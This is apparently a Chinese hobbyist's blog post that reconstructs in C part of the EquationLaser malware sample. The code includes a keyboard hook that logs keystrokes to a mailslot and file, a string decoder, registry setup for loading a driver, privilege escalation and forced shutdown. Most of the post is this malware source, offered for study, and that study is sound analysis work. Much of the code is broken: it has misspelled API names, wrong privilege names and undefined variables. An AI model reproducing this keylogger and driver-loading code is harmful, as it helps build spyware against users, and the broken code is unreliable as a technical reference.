EquationLaser是方程式樣本中的較早,從它的程式設計應用技巧的"古老"程度可以看出來,當然對于我這種程式設計經驗比較欠缺的愛好者還是值得學習研究一下的.它會收集一些系統資訊,鍵盤記錄等。本來在資源裡有個驅動檔案,但是樣本裡的驅動已經釋放出去,資料全為零,是以主要的功能應該還沒分析到。
(僅供參考)
#include"stdafx.h"
#include<stdio.h>
#include<aclapi.h>
#include<process.h>
#include<winsock2.h>
#include<winuser.h>
#include<winnt.h>
#include<windows.h>
WORD MaxUdpDg=0;//word_100509c0
DWORD dword_69f84,dword_69f88,dword_1f74c,dword_1f750,dword_1f754,dword_6a010;
LONG Addend=0;
bool IsDeviceOpen=false,IsExitWinNeeded;
HANDLE hDevice=INVALID_HANDLE_VALUE,hHandle=INVALID_HANDLE_VALUE,hThread=INVALID_HANDLE_VALUE,hmod=INVALID_HANDLE_VALUE;
OSVERSIONINFOA Size;
HHOOK hhk[3];
char mailslot_name[0x30]="\\\\.\\mailslot\\__MS_1509_";
char Name[4076];
typedef bool(WINAPI *_OpenProcessToken)(HANDLE ProcessHandle,DWORD DesiredAccess,PHANDLE TokenHandle);
typedef bool(WINAPI *_LookupPrivilegeValue)(LPCTSTR lpSystemBame,LPCTSTR lpName,PLUID lpLuid);
typedef bool(WINAPI *_AdjustTokenPrivileges)(HANDLE TokenHandle,BOOL DisableAllPrivileges,PTOKEN_PRIVILEGES NewState,
DWORD BufferLength,PTOKEN_PRIVILEGES PreviousState,PDWORD ReturnLength);
typedef DWORD(WINAPI *_SetSecurityInfo)(HANDLE handle,SE_OBJECT_TYPE ObjectType,SECURITY_INFORMATION SecurityInfo,
PSID psidOwner,PSID psidGroup,PACL pDacl,PACL pSacl);
int version_info();
int OpenServiceManager();
void compute_seed(int *a,int *b,int *c);
void ShutdownPrivilege();
unsigned int _stdcall NewThread(LPVOID para);
LRESULT fn(int code,WPARAM wParam,LPARAM lParam);
BOOL APIENTRY DllMain(HINSTANCE hinstDLL,DWORD fdwReason,LPVOID lpReserved)
{
switch(fdwReason)
{
case DLL_PROCESS_ATTACH://1
{
if(version_info()==0)
{
if(Addend==0)
{
hThread=(HANDLE)_beginthreadex(0,0x100000,&NewThread,0,0,0);
if(hThread!=NULL)
{
IsExitWinNeeded=false;
}
else
{
return true;
}
}
hmod=hinstDLL;
InterlockedIncrement(&Addend);
}
break;
}
/*
case DLL_THREAD_ATTACH://2
{
break;
}
case DLL_THREAD_DETACH://3
{
break;
}
*/
case DLL_PROCESS_DETACH://0
{
//
if(version_info()==0)
{
InterlockedDecrement(&Addend);
if(Addend==0)
{
//sub_1000f7fb
}
if(IsDeviceOpen!=false)
{
if(hDevice!=INVALID_HANDLE_VALUE)
{
CloseHandle(hDevice);
}
else
{
hDevice=NULL;
IsDeviceOpen=false;
}
}
ReleaseSemaphore(hHandle,7,0);
Sleep(0xbb8);
if(IsExitWinNeeded==false)
{
ShutdownPrivilege();
ExitWindows(6,0);
}
}
break;
}
}
return TRUE;
}
int version()
{
DWORD dwVersion=0;
DWORD dwMajorVersion=0;
DWORD dwMiniorVersion=0;
DWORD dwBuild=0;
dwVersion=GetVersion();
// printf("dwVersion:%8x\n",dwVersion);
//get windows version
dwMajorVersion=(DWORD)(LOBYTE(LOWORD(dwVersion)));
dwMiniorVersion=(DWORD)(HIBYTE(LOWORD(dwVersion)));
dwBuild=(DWORD)(HIWORD(dwVersion));
//printf("Version is %d.%d (%d)\n",dwMajorVersion,dwMiniorVersion,dwBuild);
if(dwVersion<0x80000000)
{
if(dwMajorVersion==3)
{
if(dwMiniorVersion>=0x32)
{
return 0;
}
else
{
return 1;
}
}
else
{
return 0;
}
}
else
{
if(dwMajorVersion>=4)
{
return 0;
}
else
{
return 1;
}
}
}
unsigned int _stdcall NewThread(LPVOID para)
{
//
SetThreadPriority(GetCurrentThread(),0);
SetErrorMode(0x8003);
Size.dwOSVersionInfoSize=0x94;
if(GetVersionExA(&Size)==1)
{
if(Size.dwOSVersionInfoSize==2)
{
dword_1f74c=1;
if(Size.dwMajorVersion==5)
{
dword_1f750=1;
}
}
else
{
if((Size.dwMajorVersion==4)&&(Size.dwMinorVersion==0x5a))
{
dword_1f754=1;
dword_1f74c=1;
}
else
{
dword_1f754=0;
}
}
}
if(dword_1f74c==1)
{
if(OpenServiceManager()!=0)
{
return 0;
}
}
/*
*/
return 0;
}
int OpenServiceManager()
{
SC_HANDLE sc_handle=INVALID_HANDLE_VALUE;
sc_handle=OpenSCManagerA(0,0,0xf003f);
if(sc_handle==INVALID_HANDLE_VALUE)
{
Sleep(0xea60);
OpenServiceManager();
}
CloseServiceHandle(sc_handle);
return 0;
}
void decode(char *string,int length)
{
int num_to_shift=3,a=0x9ea6,b=0x4f53,c=0x7,temp=0,i=0;
while(length)
{
compute_seed(&a,&b,&c);
temp=(string[i])&7;
string[i]=(a>>num_to_shift)^(string[i]);
num_to_shift=temp;
length--;
i++;
}
}
void compute_seed(int *a,int *b,int *c)
{
int temp=0,v=0;
v=temp=(8*(*a))|((*a)>>13);
*a^=*b;
*b=(*c)^(temp&(0xfff8));
*c=v&7;
}
int GetRegkeyReady()
{
char *Class;
int finished=0;
DWORD dwDisposition,data;
HKEY hkResult;
if(RegCreateKeyExA(HKEY_LOCAL_MACHINE/*0x80000002*/,"System\\CurrentControlSet\\Services\\Fdisk",0,Class,0,0x0f003f,
0,&hkResult,&dwDisposition)==0)
{
data=1;
if(RegSetValueEx(hkResult,"Type",0,4,&data,4)==0)
{
data=3;
if(RegSetValueEx(hkResult,"Start",0,4,&data,4)==0)
{
data=0;
if(RegSetValueEx(hkResult,"ErrorControl",0,4,&data,4)==0)
{
finished=1;
}
}
}
RegCloseKey(hkResult);
}
return finished;
}
bool load_driver_get_handle()
{
/*
1,get load driver privilege
2,get address of NtLoadDriver(IN PUNICODE_STRING DriverServiceName)
3,load driver by call NtLoadDriver(\Registry\Machine\System\CurrentControlSet\Services\Fdisk)
*/
hDevice=CreateFileA("\\.\fdisk0",0xc0000000,0,0,3,0x80,0);
return hDevice==INVALID_HANDLE_VALUE?0:1;
}
bool device_io_control_2224d8()
{
DWORD ByteReturned=0;
if(Size.dwPlatformId==VER_PLATFORM_WIN32_NT)
{
if(hDevice!=INVALID_HANDLE_VALUE)
{
if(false==DeviceIoControl(hDevice,0x2224d8,0,0,0,0,&ByteReturned,0))
{
return false;
}
}
else
{
return false;
}
}
}
DWORD get_hardware_info(DWORD address)//get some hardware information
{
DWORD num1,num2,num3;
/*
mov dx,0cf8h
in eax,dx
mov num2,eax
mov ecx,address
mov num1,0cf8h
mov eax,ecx
and al,0fch
mov address,eax
out dx,eax
and ecx,3
add ecx,0cfch
mov address,ecx
mov dx,address
in eax,dx
mov num1,eax
mov ecx,num2
mov num2,0cf8h
and ecx,0fffffffch
mov address,ecx
mov dx,num2
mov eax,address
out dx,eax
;
mov eax,num1
*/
}
bool check_version()//VER_PLATFORM_WIN32_NT
{
OSVERSIONINFOA version_info;
version_info.dwOSVersionInfoSize=0x94;
if(dword_69f84!=0)
{
if(0!=GetVersionExA(&version_info))
{
MessageBoxA(NULL,"Failed to get Windows version",NULL,NULL);
exit(2);
}
else
{
if(VER_PLATFORM_WIN32_NT==version_info)
{
dword_69f84=1;
dword_69f88=1;
}
else
{
dword_69f88=0;
}
}
}
return dword_69f88;
}
void ShutdownPrivilege()//SeLoadDriverPrivilege
{
int ret=0;
HMODULE hObject;
HANDLE handle;
LUID l_luid={0};
TOKEN_PRIVILEGES l_token_privilege={0};
_OpenProcessToken l_OpenProcessToken;
_LookupPrivilegeValue l_LookupPrivilegeValue;
_AdjustTokenPrivileges l_AdjustTokenPrivileges;
hObject=LoadLibrary("ADVAPI32.DLL");
if(hObject!=NULL)
{
l_OpenProcessToken=(_OpenProcessToken)GetProcAddress(hObject,"OpenProcessToken");
if(l_OpenProcessToken!=0)
{
l_LookupPrivilegeValue=(_LookupPrivilegeValue)GetProcAddress(hObject,"LookupPrivilegeValue");
if(l_LookupPrivilegeValue!=0)
{
l_AdjustTokenPrivileges=(_AdjustTokenPrivileges)GetProcAddress(hObject,"AdjustTokenPrivileges");
if(l_AdjustTokenPrivileges!=0)
{
if(l_OpenProcessToken(GetCurrentProcess(),0x28,&handle)==true)
{
if(l_LookupPrivilegeValue(0,"SeShutdownDriverPrivilege",&l_luid)==true)
{
l_token_privilege.Privileges->Luid.HighPart=l_luid.HighPart;
l_token_privilege.Privileges->Luid.LowPart=l_luid.LowPart;
l_token_privilege.Privileges->Attributes=SE_PRIVILEGE_ENABLED;
l_token_privilege.PrivilegeCount=1;
l_AdjustTokenPrivileges(handle,false,&l_token_privilege,0x10,0,0);
//if(GetLastError()==0)
//{
// if(handle!=NULL)
// CloseHandle(handle);
// FreeLibrary(hObject);
//}
}
}
}
}
}
}
if(handle!=NULL)
CloseHandle(handle);
if(hObject!=NULL)
FreeLibrary(hObject);
}
int _WSAStartup(WORD wVersionRequested,char socket_num)
{
WSAData wsaData;
if(0!=WSAStartup(wVersionRequested,&wsaData))
{
return 1;
}
if(LOBYTE(wsaData.wVersion)<LOBYTE(wVersionRequested)||HIBYTE(wsaData.wVersion)<HIBYTE(wVersionRequested))
{
return 1;
}
else if(LOBYTE(wsaData.wVersion)!=LOBYTE(wVersionRequested)||(LOBYTE(wsaData.wVersion)==LOBYTE(wVersionRequested)&&HIBYTE(wsaData.wVersion)>=HIBYTE(wVersionRequested)))
{
if(wsaData.iMaxSockets<socket_num)
{
return 1;
}
MaxUdpDg=wsaData.iMaxUdpDg;
return 0;
}
}
int windows_hook(char *lpszDesktop,int hhook_num,int set_or_unset)
{
int ret=0;
HWINSTA hWinSta=NULL;
HWINSTA hWinSta0=NULL;
HDESK hDesktop=NULL;
do
{
hWinSta=GetProcessWindowStation();
if(hWinSta==NULL)
{
ret=0;
break;
}
hDesktop=GetThreadDesktop(GetCurrentThreadId());
if(hDesktop==NULL)
{
ret=0;
break;
}
hWinSta0=OpenWindowStationA("winsta0",false,WINSTA_ALL_ACCESS);
if(hWinSta0==NULL)
{
ret=0;
break;
}
if(false==SetProcessWindowStation(hWinSta0))
{
ret=0;
break;
}
lpszDesktop=OpenDesktopA(lpszDesktop,0,false,MAXIMUM_ALLOWED);
if(lpszDesktop==NULL)
{
ret=0;
break;
}
if(false==SetThreadDesktop(lpszDesktop))
{
ret=0;
break;
}
if(set_or_unset==0)
{
unset_hook();
}
else
{
if(0==set_hook(hhook_num))
{
ret=0;
break;
}
}
if(0==SetProcessWindowStation(hWinSta)||0==SetThreadDesktop(hDesktop)||CloseWindowStation(hWinSta0))
{
ret=CloseDesktop(lpszDesktop)?1:0;
}
}while(0);
return ret;
}
int set_hook(int hhook_num)//record key stroke
{
HHOOK hook=NULL;
Sleep(0);
hook=SetWindowsHookExA(WH_KEYBOARD,(HOOKPROC)fn,hmod,0);
InterlockedExchange(hhk+hhook_num,hook);
return hhk[hhook_num]?1:0;
}
void unset_hook(int hhook_num)
{
if(hhk[hhook_num]!=NULL)
{
Sleep(0);
UnhookWindowsHookEx(hhk[hhook_num]);
hhk[hhook_num]=NULL;
}
}
LRESULT fn(int code,WPARAM wParam,LPARAM lParam)
{
return record(hhk,code,wParam,lParam);
}
int record(HHOOK hhk,int code,WPARAM wParam,LPARAM lParam)
{
HANDLE file=INVALID_HANDLE_VALUE;
DWORD NumberOfBytesWritten=0;
WORD buffer[3]={0};
LONG result=0;
result=CallnextHookEx(hhk,code,wParam,lParam);
if(code==0)
{
if(dword_6a010!=0)
{
buffer[0]=GetCurrentProcessId();
buffer[1]=wParam;
buffer[2]=lParam; //0X40000000 1 3
file=CreateFile(Name,GENERIC_WRITE,FILE_SHARE_DELETE,null,OPEN_EXISTING,FILE_ATTRIBUTE_NORMAL,NULL);
if(INVALID_HANDLE_VALUE==file)
{
dword_6a010=0;
}
if(true==WriteFile(file,buffer,8,&NumberOfBytesWritten,NULL))
{
CloseHandle(file);
dword_6a010=1;
}
}
}
return result;
}
DWORD WINAPI do_read_mailslot(LPARAM lParam)
{
char buffer[0x50];
DWORD bytes_num=0,nNumberOfBytesToWrite;
HANDLE hObject=INVALID_HANDLE_VALUE;
HANDLE hMailslot=INVALID_HANDLE_VALUE;//4
HMODULE hModule=INVALID_HANDLE_VALUE;
_SetSecurityInfo l_SetSecurityInfo=NULL;
hObject=CreateFile((char *)lParam+0x2c0,GENERIC_WRITE,FILE_SHARE_READ,NULL,OPEN_ALWAYS,NULL,NULL);
if(INVALID_HANDLE_VALUE!=hObject)
{
bytes_num=SetFilePointer(hObject,0,NULL,FILE_END);
if(bytes_num>*(DWORD *)((PVOID)lParam+0x2bc))
{
CloseHandle(hObject);
Clean_hook_and_key(lParam);
_endthreadex(1);
return 0;
}
lstrcpynA(Name,mailslot_name,0x103);
hMailslot=CreateMailslotA(Name,0,0,NULL);
if(INVALID_HANDLE_VALUE==hMailslot)
{
CloseHandle(hObject);
clean_hook_and_key(lParam);
_endthreadex(1);
}
if(0!=dword_1f74c)
{
hModule=LoadLibraryA("advapi32.dll");
if(hModule)
{
l_SetSecurityInfo=(_SetSecurityInfo)GetProcAddress(hModule,"SetSecurityInfo");
if(NULL!=l_SetSecurityInfo)
{ //6
if(ERROR_SUCCESSW==l_SetSecurityInfo(hMailslot,SE_KERNEL_OBJECT,PROCESS_SET_SESSIONID,NULL,NULL,NULL,NULL))
{
nNumberOfBytesToWrite=0;
dword_6a010=1;
do
{
nNumberOfBytesToWrite=0x50;
if(0!=read_mailslot(hMailslot,buffer,&nNumberOfBytesToWrite))
{
if(nNumberOfBytesToWrite>0)
{
if(true==WriteFile(hObject,buffer,nNumberOfBytesToWrite,NULL,NULL))
{
bytes_num+=nNumberOfBytesToWrite;
if(nNumberOfBytesToWrite>=*(DWORD *)((char *)lParam+0x2bc))
{
dword_6a010=0;
}
}
}
}
else
{
dword_6a010=0;
}
Sleep(0xfa);
}while(dword_6a010);
CloseHandle(hObject);
CloseHandle(hMailslot);
clean_hook_and_key(lParam);
return 0;
}
}
}
}
}
else
{
Clean_hook_and_key(lParam);
_endthreadex(1);
return 0;
}
}
bool check_root_drive_info(char lpRootPathName)
{
DWORD FileSystemFlags;
DWORD MaximumComponentLength;
char FileSystemNameBuffer[MAX_PATH];
if(GetVolumeInformation(lpRootPathName,NULL,0,NULL,&MaximumComponentLength,&FileSystemFlags,MAX_PATH,FileSystemNameBuffer))
{
if(0==lstrcmpA(FileSystemNameBuffer,"NTFS")&&FileSystemFlags==FILE_PERSISTENT_ACLS)
{
/*
FILE_PERSISTENT_ACLS,The specified volume preserves and enforces
access control lists(ACL).For example,the NTFS file system preserves
and enforces ACLs,and the FAT file system does not.
*/
return true;
}
}
return false;
}
int select(DWORD optlen)
{
fd_set writefds;
fd_set exceptfds;
char* optval=NULL;
timeval timeout;
writefds.fd_count=1;
writefds.fd_array=sock;
exceptfds.fd_count=1;
exceptfds.fd_array=sock;
if(optlen>0x3e8)
{
timeout.tv_usec=0;
timeout.tv_sec=optlen/0x3e8;
}
else
{
timeout.tv_usec=0;
timeout.tv_sec=0x3e8*optlen;
}
if(1=select(0,NULL,&writefds,&exceptfds,&timeout))
{
if(0==_WSAFDIsSet(sock,&exceptfds))
{
return _WSAFDIsSet(sock,&writefds)>0?1:0;
}
}
else
{
optlen=4;
return getsockopt(sock,SOL_SOCKET,SO_ERROR,(char*)&optval,&optlen)|0xff;
}
}
void clean_hook_and_key(void* lparam)
{
/*
*/
}
![在DOS下運作不了ipconfig指令[圖]](data:image/gif;base64,R0lGODlhAQABAIAAAP///wAAACwAAAAAAQABAAACAkQBADs=)